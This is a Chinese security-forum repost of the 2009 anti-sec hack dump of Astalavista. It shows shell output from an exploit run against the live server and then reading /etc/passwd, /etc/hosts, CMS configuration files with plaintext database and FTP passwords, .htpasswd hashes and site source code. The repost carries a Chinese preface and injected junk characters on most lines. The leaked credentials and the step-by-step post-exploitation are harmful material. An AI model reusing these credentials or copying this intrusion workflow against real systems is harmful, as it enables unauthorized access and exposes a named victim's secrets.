中国网络渗透测试联盟

标题: Astalavista被蹂躏过程 [打印本页]
作者: admin    时间: 2012-11-6 21:07
标题: Astalavista被蹂躏过程
里面两个亮点,一是远程获得apache用户权限的shell,banner是LiteSpeed,看来这玩意有0day,但是又怎么是用apache用户跑的,原来LiteSpeed这东西是和apache绑一起的,大概看了下介绍,主要功能是anti-ddos,这东西貌似还有点意思,回头玩玩。具体的看链接标记[url]http://www.litespeedtech.com/litespeed-web-server-features.html[/url]。
8 Y( ~0 C; L0 O6 ]: c
- ?7 _$ f, {6 f! P' Y# f2 r[root@front3 ~]# curl -I litespeedtech.com
  Y: C  k) ?/ o* i3 q* K' D% h4 _HTTP/1.1 200 OK$ U9 ~; q* _+ K+ `+ T8 @: \2 V
Date: Fri, 05 Jun 2009 22:54:51 GMT
/ G/ o* w0 `1 }/ }* LServer: LiteSpeed% S% k5 H  a$ B4 |8 K
. v7 x; q: o6 z. f$ T8 n% @$ @4 l. j
另外一个亮点就是localroot了,如果不是udev的话,那么就是RHEL5.3  x64还有一个localroot 0day -_-
' n% j6 I/ L0 w. Y: l6 r* u) @) `# B% s% g& G) l
有人说astalavista被黑是因为Y拿milw0rm的东西赚钱,这个我觉得就是每个人的尺度问题,有人还把别人写的文章弄成自己写的,还有人把别人的程序改成自己的,多了去了。! K4 `/ r$ [  M) v3 I( O& Q

+ w- }+ u  {: u8 Q. h! i6 f
( U; i* c3 W$ g* ^. U1 L/  _  \  /   _____/\__    ___/  _  \ |    |     /  _  \   \ /   /|   |/   _____/\__    ___/  _  \
/ F9 U6 y& E7 p/ N/  /_\  \ \_____  \   |    | /  /_\  \|    |    /  /_\  \   Y   / |   |\_____  \   |    | /  /_\  \1 X3 ]3 Y2 x: o4 |& u2 I
/    |    \/        \  |    |/    |    \    |___/    |    \     /  |   |/        \  |    |/    |    \- }  D' ?: N2 W1 S6 ~  u1 `1 j
\____|__  /_______  /  |____|\____|__  /_______ \____|__  /\___/   |___/_______  /  |____|\____|__  /
/ R7 u% r0 [! G: F' R0 q, D        \/        \/                 \/        \/       \/                     \/                 \/% h/ E) i& F. h& V' a& M8 e
                                  The Hacking & Security Community
0 v) Z8 ~9 E% W8 O& c# H  M[+] Founded in 1997 by a hacker computer enthusiast
/ i: L+ V' m& ~' b* z0 K" s[-] Exposed in 2009 by anti-sec group
' y2 H$ L- U! l
7 X; n& D! W9 ^From < <b style=”color:black;background-color:#ffff66″>http</b>://<b style=”color:black;background-color:#ffff66″>astalavista</b>.<b style=”color:black;background-color:#ffff66″>com</b>/faq>:, M4 u: p: s! |  d8 l! `
>> 03. Who’s behind the site?  B" x% Y0 F5 ~* U3 n+ X- w4 w
>>
9 D6 Q3 ~  v. r# g>> A team of security and IT professionals, and a countless number of contributors from all over the world.
: x0 D! P# x" A+ l; l
& y" z  m9 O. C: G: R+ ]- a  K>> 05. Is it true that the site is visited by script-kiddies and warez fans only?/ ]3 q( ?: G. t: X. a0 a
>>, E9 c( J) v* r7 b& C
>> Absolutely not! The audience behind the site consists of home users, worldwide companies and corporations, educational and non-profit organizations, government and
' G! P' }& h9 i9 i+ {1 Gmilitary institutions.
4 h/ W0 e0 U" v. }5 U2 _& c: L>> All of these have been visiting the site on a daily basis for the past couple of years, contributing in various ways, or requesting services and information.) R2 @& I6 C8 d: R8 R) G! ]4 R
2 C! ~6 i! s8 P9 T1 t, Y! U
Why has Astalavista been targeted?
* I  }) `5 G3 D8 l1 T& v! d% `  D/ A" o# t8 {) Z& H$ g2 w
Other than the fact that they are not doing any of this for the “community” but, }/ ]! M3 w$ o
for the money, they spread exploits for kids, claim to be a security community
) L# H  {+ K3 e7 `$ x(with no real sense of security on their own servers), and they charge you $6.66
. H! d* ^! d4 Kper months to access a dead forum with a directory filled with public releases
5 }8 Z9 X+ I5 s7 ^- vand outdated / broken services.# W- @9 R0 l( h, `. `5 S: k1 ]

1 P3 _8 I  V& pWe wanted to see how good that “team of security and IT professionals” really is.
$ C4 Q4 e0 ]0 q5 l* a% z8 S' S& T9 W6 |3 `; B4 @
Let’s begin.
0 ^! T1 h4 |4 E- O, B! \* E% \3 |
! q! H+ k8 M3 e4 N4 Z7 uanti-sec:~# ./g0tshell astalavista.com -p 80/ M% A4 B- ~7 ~& H: H' Y9 v
[+] Connecting to astalavista.com:80
/ a4 F9 ?6 n+ N7 X2 x# S[+] Grabbing banner…4 P0 w! r, v' `  q
LiteSpeed! x" D5 Z2 H5 |. @
[+] Injecting shellcode…2 s! a" L& q7 w, l. e
[-] Wait for it
) G. h3 j: g: n8 g0 h& q- B
; G. F6 v' i3 t[~] We g0tshell
$ ]9 _. `6 q) Muname -a: Linux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux
0 }2 T- ^3 {( U" Z. w  Z& ]ID: uid=100(apache) gid=500(apache) groups=500(apache)
" C4 Y- T6 K6 P; g& o+ A/ h1 M  g: S/ B2 S, e6 d+ E; o+ _7 r" y
sh-3.2$ cat /etc/passwd
+ k8 T# z5 o  a3 k; n7 w$ aroot:x:0:0:root:/root:/bin/bash. O$ P2 G2 b1 D. k4 {* \7 [
bin:x:1:1:bin:/bin:/sbin/nologin
6 _' @" k! ~& m6 U3 B1 i+ F! zdaemon:x:2:2:daemon:/sbin:/sbin/nologin- q5 r# B( \/ r. F  |* M" x# U0 l
adm:x:3:4:adm:/var/adm:/sbin/nologin. @' M' `( i: i7 a$ B7 @* J
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin3 S9 I7 q4 D, t; p7 o2 D3 P% y
sync:x:5:0:sync:/sbin:/bin/sync9 D0 `' g. P; O3 ~& W4 W
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
3 f7 y* M$ t1 z# [9 `* ehalt:x:7:0:halt:/sbin:/sbin/halt
2 B. [# G( o7 j* J6 r7 y4 R& @mail:x:8:12:mail:/var/spool/mail:/sbin/nologin0 H4 u( Q( Y- q) E$ ?3 t3 N
news:x:9:13:news:/etc/news:5 o3 D: ^# F/ V  @% e. j
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
. w  I3 E1 M4 q$ R' foperator:x:11:0perator:/root:/sbin/nologin; o. ~, E; e5 c9 x& D5 O! w
games:x:12:100:games:/usr/games:/sbin/nologin; G8 M* p" y' b/ E) n
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin- L' N" I9 x: m: |7 @5 A7 U5 w
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
# _) w3 ?# ^5 n1 H5 u( v( Inobody:x:99:99:Nobody:/:/sbin/nologin
5 S! F' ?2 P, b6 W( Srpm:x:37:37::/var/lib/rpm:/sbin/nologin+ C# v* _0 `# m# C1 G
dbus:x:81:81:System message bus:/:/sbin/nologin
: n# T+ w6 @; Inscd:x:28:28:NSCD Daemon:/:/sbin/nologin
, d$ w0 ~' I; @0 W, emailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
: z( h' [( a8 G6 k. _' e, G8 nsmmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
, @9 A" ]3 z, Y. n0 @5 i. n. qvcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin: R. t3 K( a' v/ F9 d1 f
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
2 n$ P5 M, x: S2 W; G9 `# |, [rpc:x:32:32ortmapper RPC user:/:/sbin/nologin
( G; l8 a9 ^" Y0 erpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
6 E0 v2 b' P& Jnfsnobody:x:4294967294:4294967294:Anonymous NFS User:/var/lib/nfs:/sbin/nologin- {. L" G8 M/ l+ S
sshd:x:74:74rivilege-separated SSH:/var/empty/sshd:/sbin/nologin
) T' [" @& Y9 p  E( L' L! opcap:x:77:77::/var/arpwatch:/sbin/nologin+ t& d9 }- B# Q* E
named:x:25:25:Named:/var/named:/sbin/nologin
  x3 H6 S" c+ {( B& T- @$ Tapache:x:100:500::/var/www:/bin/false, i; u2 n) S& G) `1 t
diradmin:x:101:101::/usr/local/directadmin:/bin/bash
% j" M/ |* }% e3 Cmysql:x:102:102:MySQL server:/var/lib/mysql:/bin/bash' l! }( x( f2 U0 l" y1 y
webapps:x:500:501::/var/www/html:/bin/bash
6 ?* U( G& Z! b; u* omajordomo:x:103:2::/etc/virtual/majordomo:/bin/bash
' c- ?- P8 O' _6 `- D  p9 M: L' G% oadmin:x:501:502::/home/admin:/bin/bash/ f6 ]+ @4 b# e. T. J% K
jon:x:502:503::/home/jon:/bin/bash
- }; p& F7 O" S, @com:x:503:504::/home/com:/bin/bash
2 B- O* O; Y) b# S8 Kntp:x:38:38::/etc/ntp:/sbin/nologin/ {7 d. O1 \7 Y7 _
ais:x:39:39penais Standards Based Cluster Framework:/:/sbin/nologin: N" c; w3 v1 Q, Y/ T4 o  l$ {
astanet:x:504:505::/home/astanet:/bin/bash4 n& F& S, H6 A4 G# Z. z
avahi:x:70:70:Avahi daemon:/:/sbin/nologin7 o' z. y4 i: j5 y
avahi-autoipd:x:104:103:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin' G; e! b2 C2 [/ ?/ u+ h  A3 _) J, h

9 j) M0 J' B9 ash-3.2$ cat /etc/hosts
6 p; O; X. Z- z4 c! B4 z/ t7 E! ^# Do not remove the following line, or various programs+ @7 G7 i# J2 k$ J8 d0 H) H
# that require network functionality will fail.. y2 D8 h( x5 p5 t. O4 v; ?
127.0.0.1       localhost.localdomain   localhost
1 c2 u6 F( p6 w. c6 S3 \: q::1     localhost6.localdomain6 localhost6; M4 ~; K: G4 F. c( c
80.74.154.172           asta1.astalavistaserver.com4 O* b7 ~" P, W" \

& m3 f) g; F) H# ~sh-3.2$ pwd6 b% I' H! U5 p- v! v- E$ T9 h
/home/com/public_html( h5 }. Q0 k( }) q, d
. n0 p6 W5 _5 W0 ^3 i
sh-3.2$ ls -la
$ K/ Q1 x+ c/ Dtotal 18460
" T4 y( ?) y$ t- o- E" adrwxr-xr-x 30 com apache     4096 May 28 17:06 .
& x/ i4 S! Y  f5 V+ A) J7 Fdrwx–x–x 11 com com        4096 Jun 25  2008 ..- C4 c* J; \: _* L6 E' I# j/ c
drwxr-xr-x  2 com com        4096 Feb  2 19:29 admin3 m. i6 V" {0 ]  J6 f3 E. O% w
drwxrwxrwx  2 com com    18591744 Jun  4 08:04 cache
3 `5 X! D+ p: H; Q0 Jdrwxr-xr-x  6 com com        4096 Mar 28 21:17 cadmin7 h. k0 q9 n1 I( C3 B& R9 Y
drwxrwxrwx  2 com com        4096 May 19 00:50 config5 ^# ]: r7 c+ b+ R! V* {
drwxr-xr-x  2 com com        4096 Mar 20 11:05 core
8 ]( P! p! f/ hdrwxr-xr-x 18 com com        4096 Feb  2 19:29 core_modules! H1 z9 N5 G# X- x" g! s9 X
drwxr-xr-x  4 com com        4096 Feb  2 19:29 customizing
4 z" |/ f7 k$ _5 q9 n" J3 L4 l) Qdrwxr-xr-x  2 com com        4096 May 11 13:24 customizing_paulo
" a4 g/ `0 K5 Mdrwxr-xr-x  6 com com        4096 Mar 30 12:28 __DELETE__* g, F, x5 m8 c0 z4 q
-rw-r–r–  1 com com        8035 May 19 14:26 directory_to_mediadir.php
7 M2 ~! X+ d( r) ~6 Hdrwxr-xr-x  2 com com        4096 Sep  9  2008 dvd  p5 n6 X5 A+ F8 O2 m# X' t* {: q
drwxr-xr-x  3 com com        4096 Feb  2 19:29 editor- n/ Q2 k5 h7 [! `! y, z6 {( g
-rw-r–r–  1 com com        3750 Feb 27 16:12 favicon.ico
+ p! P5 P0 @0 V  e0 ]drwxrwxrwx  2 com com        4096 Jun  4 08:00 feed
3 k  P7 ?* A9 P9 [/ A; e-rwxrwxrwx  1 com com       10736 May 29 12:44 .htaccess" ]7 x* b# P8 d3 e& f
-rw-r–r–  1 com com        7638 Apr 21 08:45 .htaccess.2009-04-21.bak
/ Y+ K* |) t4 A-rw-r–r–  1 com com       10768 May 11 11:53 .htaccess.2009-05-11.bak" z0 G, _% [! T: ^
drwxr-xr-x 18 com com        4096 Apr  9  2008 ideapool
4 L4 O' r, P* h' r. {- o+ Wdrwxrwxrwx 14 com com        4096 Feb  2 19:29 images; Q5 k! `6 T/ S4 s2 ]
-rw-r–r–  1 com com       97496 Jun  2 13:01 index.php
/ h0 f! P7 L+ o/ D" U$ Z) Bdrwxr-xr-x  6 com com        4096 Feb  2 19:29 installer& z$ o4 A0 c& `, P4 q
drwxr-xr-x  8 com com        4096 Feb  2 19:29 lang* H# E# M$ |& j+ B$ m+ I
drwxr-xr-x 22 com com        4096 Feb  2 19:29 lib# ?, h4 z4 \+ G1 }  w
drwxrwxrwx 12 com com        4096 Jun  2 07:47 media" c( {+ H9 P/ Y; j: V
drwxr-xr-x  8 com com        4096 May 11 12:48 modifications
1 e  A' q1 |+ v9 R3 u( w: _drwxr-xr-x 34 com com        4096 May 28 16:30 modules
6 Z, `. q; K  `, _- _& r5 _9 [& tdrwxr-xr-x 11 com com        4096 Jan 30 15:00 _myAdmin  Y* l# ]+ a( q8 X$ R# f% C2 P
drwxrwxr-x 22 com com        4096 May 28 17:06 _new
: R- O3 l; u0 _) v& c, _drwxr-xr-x 26 com com        4096 Feb  2 19:27 _old
" ^$ W* ]( h! q( Z) |6 S. u; gdrwxr-xr-x  2 com com        4096 Mar 30 12:29 phproxy6 ~, |4 q9 i/ ^7 X1 y
drwxr-xr-x  2 com com        4096 Mar 30 12:30 proxy
% K; l$ h' n3 r2 f-rw-r–r–  1 com com          26 Feb  2 19:33 robots.txt  g1 B  |3 V8 L. M, r3 ?% _7 r
-rwxrwxrwx  1 com com       10844 Jun  2 09:50 sitemap.xml" s/ S# Q( q6 d; R* n
-rw-r–r–  1 com com         223 Mar 30 15:32 test.php& S* X+ _5 ]  Y  s3 F3 ^' Y
drwxrwxrwx  8 com com        4096 Mar  6 13:15 themes* ?: n/ O0 V' V6 e6 w, u7 r
drwxrwxrwx  3 com com        4096 Jun  4 08:00 tmp4 n+ Z0 H  B  B# s$ g  Z5 n, c
drwxr-xr-x  3 com com        4096 Feb  2 19:33 webcam' E+ A, Z( |" i( Y( ^. @# T3 Y
/ E( t$ [8 h3 W2 k2 a$ w
sh-3.2$ head -20 index.php
2 d& U7 b! k$ @% W<?php8 X' a5 R* L+ L- \% u
/ f' L# Z* S% Y7 j/ l- O' D3 R
/**
: c0 i, l. D, ]9 j2 ~* The main page for the CMS
. A! F$ i% k( ~' e% i  Q* @copyright   CONTREXX CMS - COMVATION AG
3 ?1 x7 }/ \+ |) l* @author      Comvation Development Team  ?8 i. A! g- w8 {8 G
* @version     v1.0.9.10.1 stable9 @% W" i0 N9 w3 o. h6 v0 V
* @package        contrexx4 o4 ^, A9 H" D! X
* @subpackage    core  I6 m0 \: o5 ]! k" S* Y+ I
* @link        链接标记[url]http://www.contrexx.com/[/url] contrexx homepage
, T/ y  P9 w" u# _* @since       v0.0.0.0
6 V8 @' ~! Q1 E! S+ d6 }, d* @todo        Capitalize all class names in project$ F. T' D; x; ]2 i: M3 q
* @uses        /config/configuration.php
" t; k+ j9 W' S; o: ^' s+ m* @uses        /config/settings.php
% k  M, \% e; r; K. t2 X* @uses        /config/version.php. L. B3 }+ x# h+ m/ @: C
* @uses        /core/API.php  \& A/ W3 @8 M4 I- D1 Z5 u7 ^
* @uses        /core_modules/cache/index.class.php6 Z3 L- b/ g, s, z4 F
* @uses        /core/error.class.php
- x/ _, g( N) f- M8 h( Q* @uses        /core_modules/banner/index.class.php
9 ^8 h4 O9 Y' r* @uses        /core_modules/contact/index.class.php
! k  t: m( k+ d1 D, J6 [, ]1 `2 j$ B* |" W
sh-3.2$ cd config/
8 E1 e$ X1 X+ Hsh-3.2$ ls -la$ p- j4 [( x( Q: v: @! V
total 324 j* e7 G$ B! B0 v: {8 Q8 [9 T1 r
drwxrwxrwx  2 com com    4096 May 19 00:50 .
0 u# ]+ Y$ c: N0 T; F4 q, B0 Mdrwxr-xr-x 30 com apache 4096 May 28 17:06 ..
# U6 \1 h! Q" A1 M-rwxrwxrwx  1 com com    2998 May 11 12:29 configuration.php$ C" F7 l8 U2 O5 j- a0 \! H1 Z" O
-rwxrwxrwx  1 com com    7610 May 28 17:27 set_constants.php
7 O6 }; y' O, b1 }# q-rwxrwxrwx  1 com com    4186 May 25 12:54 settings.php
: u/ c2 C' b2 V-rwxrwxrwx  1 com com     672 Feb  2 19:29 version.php5 i4 _2 Z! @+ j# X$ E
9 S% s" ~1 d7 F. r* r9 L' m
sh-3.2$ cat configuration.php9 i4 r1 v8 G& }0 `* B* q3 M
[snip], X$ B, H8 ~- o9 i2 [  Z6 H
$_DBCONFIG['host'] = ‘localhost’; // This is normally set to localhost9 }  y1 j* o# ^* R, F2 C
$_DBCONFIG['database'] = ‘com_contrexx2_live’; // Database name
  o5 J) C$ k" R% l7 \  X$_DBCONFIG['tablePrefix'] = ‘contrexx_’; // Database table prefix' i7 R' Q9 _. O# j, G" Z- W
$_DBCONFIG['user'] = ‘contrexxuser2′; // Database username
9 s2 G  B" y1 c% d% I$_DBCONFIG['password'] = ‘0fEYNZgXz1pKe’; // Database password
3 b  T* Z: o! H4 i+ r$ P6 P  I7 ?$_DBCONFIG['dbType'] = ‘mysql’; // Database type (e.g. mysql,postgres ..)
, J1 B, ?, k  K$_DBCONFIG['charset'] = ‘utf8′; // Charset (default, latin1, utf8, ..)
- Q1 a. g; H+ W[snip]+ m1 d0 g9 T. u, A
$_FTPCONFIG['is_activated'] = true; // Ftp support true or false2 x; H. {% O8 j  ~: o! _
$_FTPCONFIG['use_passive'] = true;      // Use passive ftp mode' ]1 Q, W% [1 D7 j- c; y) P! L
$_FTPCONFIG['host']     = ‘localhost’;// This is normally set to localhost
8 }  z3 d# f9 n$_FTPCONFIG['port'] = 21; // Ftp remote port
% k. V, e1 f2 d4 _) c- n$_FTPCONFIG['username'] = ‘链接标记dev@astalavista.com’; // Ftp login username7 |- k6 z( |2 _' B7 D, }
$_FTPCONFIG['password'] = ‘jajklop0Iuj’; // Ftp login password
# U6 s  ]* X7 P$_FTPCONFIG['path']     = ‘/’; // Ftp path to cms
# N( |0 K. W1 R0 A. Y: g
: g. @; {' F. F% t3 F  Qsh-3.2$ cd ..
0 d6 `" i2 }4 O, qsh-3.2$ cd dvd/* r+ G7 d4 s+ z+ G5 C
sh-3.2$ ls -la9 Y6 i7 m$ f$ h8 }7 A6 ]
total 2913780
3 ]0 k/ I# c+ @9 Fdrwxr-xr-x  2 com com          4096 Sep  9  2008 .  Q2 U: k$ g% n4 ?
drwxr-xr-x 30 com apache       4096 May 28 17:06 ..
" X1 m5 d# ^! I! C-rw-r–r–  1 com com    1050061483 May 16  2008 astalavista_security_toolbox_dvd_2008.part1.rar
! }1 u0 n" q1 D7 O# ~-rw-r–r–  1 com com    1050061483 May 16  2008 astalavista_security_toolbox_dvd_2008.part2.rar
1 z: p$ F( n9 B-rw-r–r–  1 com com     880644069 May 16  2008 astalavista_security_toolbox_dvd_2008.part3.rar% f0 A+ n8 D2 x% j7 F
-rw-r–r–  1 com com           115 Jan 29  2008 .htaccess$ g, j2 }7 H$ D) I7 y9 {

1 P, ^7 k* G- Y6 zsh-3.2$ cat .htaccess
# z. s- k! a- Z% h- d2 A/ \authType Basic
- j4 {/ \7 `* a* u+ Q0 S% @authName DVD& A, r9 ]+ O; `# b8 _/ ~
authUserFile /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd
3 Z: L% ?9 A! w7 ?6 qrequire valid-user- Q' t2 d9 ]- H& j

. O' ^7 d# c, J( O. `7 ~sh-3.2$ cat /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd
; c7 }1 k" w9 O8 F2 PDVDdownload:CRD8cuY6.MPT69 N- m/ h2 T. w7 J( m
DVDdownload2:CR8a36.wluFMg
' ~9 O" t5 T: V! `( N5 m' {: e4 a# U; H( ]; N
sh-3.2$ cat test.php0 t7 }. Y& ?3 o) P2 v
<?php
- B- w5 D  G: u7 Q& a$url = ‘aHR0cDovL2kubnVzZWVrLmNvbS9pbWFnZXMvdGVtcGxhdGUvMzYweDMxOC9pc3QyXzc0Njc4MV9mZW1hbGVfc3R1ZGVudC5qcGc%3D’;
  i+ ?1 _# g) O$url = str_replace(array(’&amp;’, ‘&#38;’), ‘&’, base64_decode(rawurldecode($url)));2 [- w$ E3 z9 }- O1 o
echo $url;" F" R5 u* @3 X0 }6 G+ B: o
?>
* M- h3 p# C5 o# G9 X& i7 X) t" o4 z9 G
sh-3.2$ cd modifications/, @6 b6 z9 S: r3 ~: v* H
sh-3.2$ ls -la# E9 I& t" K+ c7 D' h1 a) C
total 32
0 w0 X6 r/ {: S6 H* K4 L' g8 [; _drwxr-xr-x  8 com com    4096 May 11 12:48 .
$ _  ?, v+ s: K0 ^, ydrwxr-xr-x 30 com apache 4096 May 28 17:06 ..3 ^! Z: C. f; k) J7 `- d
drwxr-xr-x  3 com com    4096 Feb  2 19:33 com_avtng5 m- ~- {1 \6 v$ k' v
drwxr-xr-x  3 com com    4096 May 12 09:26 cronjobs# X$ H4 ]* i# N  ^  V4 y
drwxr-xr-x  2 com com    4096 Mar  2 10:35 onlinetools
% K  E9 p: \( x6 w2 C$ W4 F# ydrwxr-xr-x  4 com com    4096 Feb  2 19:33 pjirc
. y$ _1 y: G- r+ }, J3 ~7 \drwxr-xr-x  2 com com    4096 Feb  2 19:33 search
0 x- P$ s* R$ p$ u3 ldrwxr-xr-x  2 com com    4096 Mar 25 08:56 _tmp- x" W3 k% q! u" P

. [) E: B- ]/ c& i/ Ssh-3.2$ ls -R2 h8 m- `, v; [/ Y3 }+ g
.:. s; v2 X* }/ k9 u, @
com_avtng  cronjobs  onlinetools  pjirc  search  _tmp
4 ?5 T0 \2 T( S7 _8 j+ J% w, T' g+ ]# U5 t4 N! e  R* x; Q( m8 p
./com_avtng:
$ c# i: _# r* Q. L, W" z& havtng.php  banner_bottom.inc.php  banner_button.inc.php  banner_content.inc.php  banner_popunder.inc.php  banner_right.inc.php  banner_top.inc.php  iframe.php  scripts$ t# R6 {4 }4 M4 `

* z5 y. |8 j: Y! s" E$ O./com_avtng/scripts:( e/ l, p0 `, l- F+ }6 _+ R/ V
popunder.js# {. I" R- Z' t7 h4 y
' l2 V; C6 N; V, S" p7 R4 V
./cronjobs:
" W) @: }$ J; f( r; W  U. |  _exploits.php  exploits.sh  google_blogindexing.php  ip2country.sh  proxydb2.php  proxydb.php  securitynews.php  tmp
: `  k4 B9 r# N7 r+ p0 e9 ^9 z
; ?) m; V$ s& J./cronjobs/tmp:- u9 a/ F! R" P9 E. f( K
contrexx_module_onlinetools_defaultports.csv  contrexx_module_onlinetools_geolitecity_country.csv
! r# t5 ?0 A) P" ~' ]
' ?# B* y9 v4 o: O+ T% w./onlinetools:5 {- X# W  l6 m- M1 s$ h
index.php
$ A, F  n' ^  t) [
7 F$ d9 i# a: d4 A* J./pjirc:9 E+ E7 P" f  x4 Q! e( f$ H7 k
a_big.jpg          english.lng       img              irc.jar           NormalApplet.html  pixx-french.lng  pjirc.cfg       securedirc-unsigned.cab  thanks.txt
# n4 e& q8 e. h' kAppletWithJS.html  french.lng        IRCApplet.class  irc-unsigned.jar  pixx.cab           pixx.jar         readme.txt      SimpleApplet.html        versions.txt
. Z) B+ g. V% g; Sbackground.gif     HeavyApplet.html  irc.cab          license.txt       pixx-english.lng   pixx-readme.txt  securedirc.cab  snd
! x* n6 r- m" D8 I+ z, I1 x+ B6 O  Z3 ]
./pjirc/img:8 m$ `/ i" b; Z, n
ange.gif    bombe.gif   clin-oeuil.gif         content.gif  enerve2.gif  garcon.gif     langue.gif  mecontent.gif  ordi.gif       portable.gif   sapin.gif    triste.gif
% H. I2 g: g, y, earbre.gif   bouche.gif  clin-oeuil-langue.gif  cool.gif     femme.gif    grognon.gif    lettre.gif  newbie.gif     pere-noel.gif  pouce-non.gif  sleep.gif   
* `- x, T$ V$ ]9 m6 ^9 c4 cverre-eau.gif# l& g- {* V! _9 i9 L* M% u
argh.gif    bouqin.gif  coeur-brise.gif        diable.gif   fille.gif    halloween.gif  lit.gif     OH-1.gif       pleure.gif     pouce-oui.gif  soleil.gif  : x& M3 S& p: |& G
verre-vin.gif  ^: H3 r; t9 N; ~! B8 W0 p% ^5 _0 \5 \6 ?
ballon.gif  cadeau.gif  coeur.gif              dwchat.gif   fleur.gif    hamburger.gif  love.gif    OH-2.gif       poisson.gif    roll-eyes.gif  sourire.gif  yinyang.gif
" p- c' e4 y- l: E1 P  Pbiere.gif   chien.gif   comprends-pas.gif      enerve1.gif  fume.gif     homme.gif      lune.gif    OH-3.gif       pomme.gif      rouge.gif      terre.gif
5 Z2 y' L+ ?1 n. u
4 ^4 ~4 y8 T$ W' M./pjirc/snd:: ~/ U- T" w. y& y+ t8 s
bell2.au  ding.au$ o- W* F' P' d7 Q) N& U) c. X

% x- P- B7 A( Q7 X% t  ^! T./search:4 y$ R& I  |; o& S& j
searchEngines.php  search.php
" @. u, F, R8 I  V# Z3 i. h% O! z; y( h4 b0 i4 u1 g
./_tmp:/ l1 T& i# ]1 N( u+ Y; k5 V
defaultPorts.php  defaultPorts.txt
% \" u$ t; R* s9 r# _: p
+ Y; F. g! h9 q9 c9 I4 @0 ?7 T  W* w- Dsh-3.2$ cd cronjobs/
: P9 J7 L" W5 @sh-3.2$ cat exploits.php9 o( y  X7 i2 U/ J
[snip]3 ?) f- z, Z, X2 v) z0 P* _# S
$categories   = array();2 M; \0 U1 J, k/ ]" [& L
$milw0rmFile  = FULLPATH . ‘/modifications/cronjobs/tmp/milw0rm/sploitlist.txt’;! Y1 K7 t+ O3 Y1 S
$expolits     = file($milw0rmFile);
9 [9 @4 k( J, I$comExploits  = array();
2 L" E: i  j2 `3 V5 \* U1 R$ _[snip]
" J- C! d* O( y. Z% |// manage data! O. }, d3 o9 m+ f8 e8 Q* j
for ($x = 0; $x < count($expolits); $x++){ // count($expolits) - 2640
/ |& W! g4 V: e- G9 S+ r
- S7 y6 I: K$ ^6 @    // get path and title, g2 U; d+ Q$ `, p
    $expolits[$x] = trim($expolits[$x]);
1 a# v* o  z' \- b    $path         = str_replace(’./’, FULLPATH . ‘/modifications/cronjobs/tmp/milw0rm/’, substr($expolits[$x], 0, strpos($expolits[$x], ‘ ‘)));
( s! K" z! ]. w. a    $title        = htmlspecialchars(substr($expolits[$x], strpos($expolits[$x], ‘ ‘) + 1, strlen($expolits[$x])), ENT_QUOTES);
3 E4 _6 w! A5 Q( U: w) [4 h+ D& H8 x# y  U
    // check if file exists
0 H* M. H9 A3 J    if (file_exists($path)) {$ g- V8 J. x0 r4 ?, P
, E& A' R& `* G
        $text = file_get_contents($path);
/ c: L* B: s" J# n7 g
, @, }  A4 A8 r) G) Q, N3 l2 E$ M        // get content and date& d" J5 i: q# N1 J  A! q( K- [5 K2 u
        //$text = htmlspecialchars($text, ENT_QUOTES);
, y' p: x: M) z' J        $tmptext = addslashes(htmlentities($text,  ENT_QUOTES, “UTF-8″));) ^" W, ~$ d: e1 Z# d# o
        if ($tmptext != ”) {
- z  X! Z7 I6 m3 P3 E; W# j            $text = $tmptext;
1 k. Q7 D- Z# m9 F% J( l: G/ T        } else {. g5 |' e" E  K& W) @7 S
            $text = addslashes(htmlentities($text,  ENT_QUOTES));
8 O5 R( n1 ?& ~0 a+ Z9 d        }
- l* G$ D8 E) {: B        $date = str_replace(’milw0rm.com [', '', str_replace(']‘, ”, strstr($text, ‘milw0rm.com [')));
* z- C% u, i' S$ I* K        $tmp  = explode('-', $date);. d0 S5 n$ W2 U5 I+ l/ c! B
        $date = mktime(0, 0, 0, trim($tmp[1]), trim($tmp[2]), trim($tmp[0]));
! x: D! H# e9 w, Q8 D        $cat  = getCategory ($path);, X' y" r. c) o& Y8 u8 \
        $ext  = pathinfo(basename($path));
3 a1 c2 v: W( h  ], C6 Z9 `        $ext  = $ext['extension'];% p- v5 s7 D5 i6 h5 f) V' X
        $qStr = ”
( A  ~/ h  y1 J4 }5 ~            SELECT  `id`
" v0 U7 S4 m, o% N/ y" \            FROM    `contrexx_module_exploits`
* {5 c- L0 m6 B# H! F) H% L            WHERE   `title`  =  ‘” . $title . “‘% }6 X4 T$ [9 I- H0 y+ V* f
            AND     `date`   =  ‘” . $date . “‘
2 s1 ~6 X/ G$ f. L        “;0 k! z9 S1 ], a$ q8 Q0 e4 e
        echo $x + 1 . ‘ von ‘ . count($expolits) . ‘ -> ‘ . $qStr . “\n”;- f! f1 _! B: r3 B; ?1 |5 z6 r7 u
        $q = $_objDB->query($qStr);: w$ t5 C- G% h; E, p7 m2 @- L3 R& x
" v% u' c0 }4 t0 Q5 V; ]
        if ($q->numRows() == 0) {( C" p( |5 ^7 k. k
# K0 n3 b8 i  C; n
            // prepare array
7 S/ [: @$ o' M- L# e( T            $comExploits[$x]['date']      = $date;: Q- W0 E1 R. \+ A8 |+ ]
            $comExploits[$x]['title']     = $title;( X- T9 m. G3 Y7 H
            $comExploits[$x]['author']    = ‘milw0rm’;& s9 x; u! U- I, L0 ]0 \9 ^
            $comExploits[$x]['text']      = $text;! l; G7 l+ `% M# F2 B6 s
            $comExploits[$x]['source']    = $ext;
6 j; P! S. t! b: R5 T5 {            $comExploits[$x]['url1']      = ”;
' s6 e$ a' L' {            $comExploits[$x]['url2']      = ”;
% ~7 T: T" K8 z  _. j( f            $comExploits[$x]['catid']     = $cat;
: y+ n3 V& f2 _            $comExploits[$x]['lang']      = ‘2′;5 X8 S# B# r7 w4 f+ C8 f8 i/ \
            $comExploits[$x]['userid']    = ‘12′;& A5 B* K: I- R. x  R5 {1 H
            $comExploits[$x]['startdate'] = ‘0000-00-00′;
